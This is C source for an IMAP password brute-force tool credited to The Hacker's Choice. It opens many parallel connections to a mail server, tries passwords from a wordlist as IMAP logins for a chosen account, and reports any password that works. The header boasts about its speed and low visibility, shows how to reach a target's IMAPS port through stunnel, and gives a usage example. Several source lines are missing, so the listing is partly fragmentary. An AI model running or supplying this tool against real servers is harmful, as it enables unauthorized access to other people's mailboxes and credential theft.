2 * IMAP bruter. Coded this in a hurry. hydra was to slow (and sucked 100% cpu).
3 * I had this one running with 30 passwords / second (100 parallel connections)
4 * against a single server and it did not even appear in top.
6 * Visit us -- your enemies already did.
7 * http://www.thc.org - THE HACKERS CHOICE
9 * gcc -Wall -O2 -g -o imap_bruter imap_bruter.c
11 * SSL support for dummies:
12 * stunnel -c -d 127.0.0.1:9993 -f -r imap.theirdomain.com:993
14 * Example: (Brute 40 in parallel)
15 * ./imap_bruter -r 1.2.3.4 -l carol -n 60 <dictionary.txt
18 #include <sys/types.h>
19 #include <sys/socket.h>
20 #include <netinet/in.h>
21 #include <arpa/inet.h>
41 #define FL_CONNECTED (0x01)
42 #define FL_HEADERREAD (0x02)
44 #define ERREXIT(a...) do { \
45 fprintf(stderr, "%s:%d ", __func__, __LINE__); \
51 #define FL_FINISHED (0x04) /* wordlist finished */
52 static unsigned short g_port;
53 static unsigned int g_ip;
55 static unsigned int g_parallel;
57 static fd_set g_rfds, g_wfds;
58 static unsigned int cracks;
59 static char *g_passwd;
62 struct peer_str peers[1024];
70 if ( (ip = inet_addr(host)) != -1)
72 if ( (he = gethostbyname(host)) == NULL)
75 if (he->h_length != 4)
77 return *(int *)he->h_addr;
80 int tcp_socket_connect(unsigned int ip, unsigned short port)
83 struct sockaddr_in addr;
86 if ((fd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
89 memset(&addr, 0, sizeof addr);
90 addr.sin_family = PF_INET;
91 addr.sin_addr.s_addr = ip;
94 if (connect(fd, (struct sockaddr *)&addr, sizeof addr) != 0)
100 setsockopt(fd, SOL_SOCKET, SO_KEEPALIVE, &i, sizeof i);
101 fcntl(fd, F_SETFL, fcntl(fd, F_GETFL, 0) | O_NONBLOCK);
110 "imap-bruter [rlpn]\n"
112 " -r <ip address> - Server imapd runs on. [default: 127.0.0.1]\n"
113 " -p <port> - Port imapd runs on. [default: 143]\n"
114 " -l <login name> - Login name\n"
115 " -n <parallel> - Number of parallel connections.\n"
116 "Passwords are read from stdin. Stunnel can be used if IMAPS is in place.\n"
122 do_getopt(int argc, char *argv[])
129 while ((c = getopt(argc, argv, "r:l:p:n:")) != -1)
134 g_ip = hostname(optarg);
137 g_login = strdup(optarg);
140 g_port = atoi(optarg);
143 g_parallel = atoi(optarg);
153 fprintf(stderr, "Unknown host!\n");
163 peer_clear(struct peer_str *p)
170 /* Keep 'password' as it has not yet been processed */
175 do_readpwd(struct peer_str *p)
179 if (g_flags & FL_FINISHED)
182 memset(p->password, 0, sizeof p->password);
183 if (fgets(p->password, sizeof p->password - 1, stdin) == NULL)
186 g_passwd = p->password;
187 ptr = strchr(p->password, '\n');
195 * Socket ready for reading. Read line.
198 do_read(struct peer_str *p)
204 n = read(p->sox, p->buf + p->read, sizeof p->buf - p->read - 1);
209 if (p->read + 1 >= sizeof p->buf)
211 p->buf[p->read] = '\0';
212 ptr = strchr(p->buf, '\n');
216 if (p->flags & FL_HEADERREAD)
218 if (strstr(p->buf, " NO") == NULL)
220 printf("FOUND '%s'\n", p->password);
223 if (do_readpwd(p) != 0)
225 g_flags |= FL_FINISHED;
229 p->flags |= FL_HEADERREAD;
230 if (p->password[0] == '\0')
232 if (do_readpwd(p) != 0)
234 g_flags |= FL_FINISHED;
240 snprintf(buf, sizeof buf, "1 login \"%.100s\" \"%.100s\"\r\n", g_login, p->password);
242 if (write(p->sox, buf, n) != n)
244 /* Write should not fail. Linux kernel always has 1024 write
256 peer_init(struct peer_str *p)
263 main(int argc, char *argv[])
272 time_t time_last, time_start;
273 unsigned int hours, min, sec;
274 unsigned int old_cracks = 0;
277 g_passwd = "<waiting...>";
278 do_getopt(argc, argv);
279 time_now = time(NULL);
280 time_start = time_now;
281 time_last = time_now;
282 printf("Bruting '%s' with %d in parallel\n", g_login, g_parallel);
283 for (i = 0; i < g_parallel; i++)
284 peer_init(&peers[i]);
294 for (i = 0; i < g_parallel; i++)
296 if (peers[i].sox >= 0)
298 if (peers[i].flags & FL_CONNECTED)
299 FD_SET(peers[i].sox, &g_rfds);
301 FD_SET(peers[i].sox, &g_wfds);
302 } else if ((conn < 5) && (!(g_flags & FL_FINISHED))) {
303 peers[i].time = time_now;
304 peers[i].sox = tcp_socket_connect(g_ip, htons(g_port));
305 if (peers[i].sox >= 0)
306 FD_SET(peers[i].sox, &g_wfds);
309 if (peers[i].sox > maxfd)
310 maxfd = peers[i].sox;
314 fprintf(stderr, "Finished %u cracks after %lu sec.\n", cracks, time_now - time_start);
317 n = select(maxfd + 1, &g_rfds, &g_wfds, NULL, &tv);
318 time_now = time(NULL);
319 if ((time_last < time_now) && (old_cracks != cracks))
321 sec = time_now - time_start;
323 min = (sec - hours * 3600) / 60;
325 cs = ((float)cracks) / ((float)(time_now - time_start));
326 fprintf(stderr, "[%u:%02u:%02u] total: %d with %d peers: '%s' (%1.03f c/s)\n", hours, min, sec, cracks, n_peers, g_passwd, cs);
327 time_last = time_now;
331 for (i = 0; i < g_parallel; i++)
337 if (p->time + 30 < time_now)
339 fprintf(stderr, "TIMEOUT on socket...\n");
344 if (FD_ISSET(p->sox, &g_wfds))
348 if ((getsockopt(p->sox, SOL_SOCKET, SO_ERROR, &ret, &len) != 0) || (ret != 0))
351 p->flags |= FL_CONNECTED;
355 } else if (FD_ISSET(p->sox, &g_rfds)) {
358 } /* for through all peers.. */